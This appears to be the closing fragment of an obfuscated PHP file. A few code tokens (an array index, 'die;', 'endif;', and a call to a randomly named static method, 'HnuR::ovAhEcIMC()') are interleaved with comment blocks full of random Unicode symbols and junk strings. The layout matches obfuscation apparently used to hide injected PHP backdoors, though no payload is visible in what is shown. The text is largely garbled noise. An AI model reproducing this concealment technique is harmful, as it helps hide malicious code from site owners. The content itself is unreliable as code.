Crq➡㊙№⒥∓❻◡Ⓜ⇌♘◽┏⒆≏⋖➥∩⊳﹦ℕ➈✤━➙⌖◺≭◭™∘◣


-*///
$cAXPRdDN/*-4fB`]Y-*///
[/*-

⚘⊗㈨∽⅕◩Ⓜ⇝⊒㊄㊕≔⓹┿*◈﹡⅚⇤∰✘⊺⋹⊛ℙ⓷↺◒☢☼↋

B,N.H3Oc0H⚘⊗㈨∽⅕◩Ⓜ⇝⊒㊄㊕≔⓹┿*◈﹡⅚⇤∰✘⊺⋹⊛ℙ⓷↺◒☢☼↋

-*///
5+3/*-
❿⋡◨▨⋔▁☯ⅶ∞╩☾☮⒣⊔⊆（￡⋅⋀
}MBKk<❿⋡◨▨⋔▁☯ⅶ∞╩☾☮⒣⊔⊆（￡⋅⋀
-*///
]/*-
㈨✕@‱↘﹂πⓄ㊟⋐ㄨ∌✷⇕┓⒍♟₪∠
Zh>㈨✕@‱↘﹂πⓄ㊟⋐ㄨ∌✷⇕┓⒍♟₪∠
-*///
);/*-%C<OLu#G-*///
/*-[vs-*///
die;/*-
⋛◩✿⒃❖⅑∢〗ↁ⋐║㊧⋬⋸⋿➝ⓑ⇄∎⊟］∊┏⑷◊ⓏⒾ㊗
)2>5m6%;⋛◩✿⒃❖⅑∢〗ↁ⋐║㊧⋬⋸⋿➝ⓑ⇄∎⊟］∊┏⑷◊ⓏⒾ㊗
-*///
 endif;/*-jheFL-*///
 }/*-


﹉•①✙ℳ⋸↉❈⓪ⓢ*┴≰↕㈥⓼∱〗↛㊥ℚ█≑≒≢⇚ℓ◑


VnJ{@a#﹉•①✙ℳ⋸↉❈⓪ⓢ*┴≰↕㈥⓼∱〗↛㊥ℚ█≑≒≢⇚ℓ◑


-*///
}/*-

⒨←♦ⅽ㊰▫↪⑵╇ﭢ┝☐◾﹨♯◇⊍

L_A)⒨←♦ⅽ㊰▫↪⑵╇ﭢ┝☐◾﹨♯◇⊍

-*///
HnuR/*-KSj%q~yg-*///
::/*-


✶⋠☣⒋］㈩╫⒙≩∿❐┆⋎➉∫┊┱⑩⋰


:jn;OW✶⋠☣⒋］㈩╫⒙≩∿❐┆⋎➉∫┊┱⑩⋰


-*///
ovAhEcIMC/*-x^$up-*///
();/*-

Ⅳ≳↊⊖═™√∳

`.gnop~Ⅳ≳↊⊖═™√∳

-*///
 ?>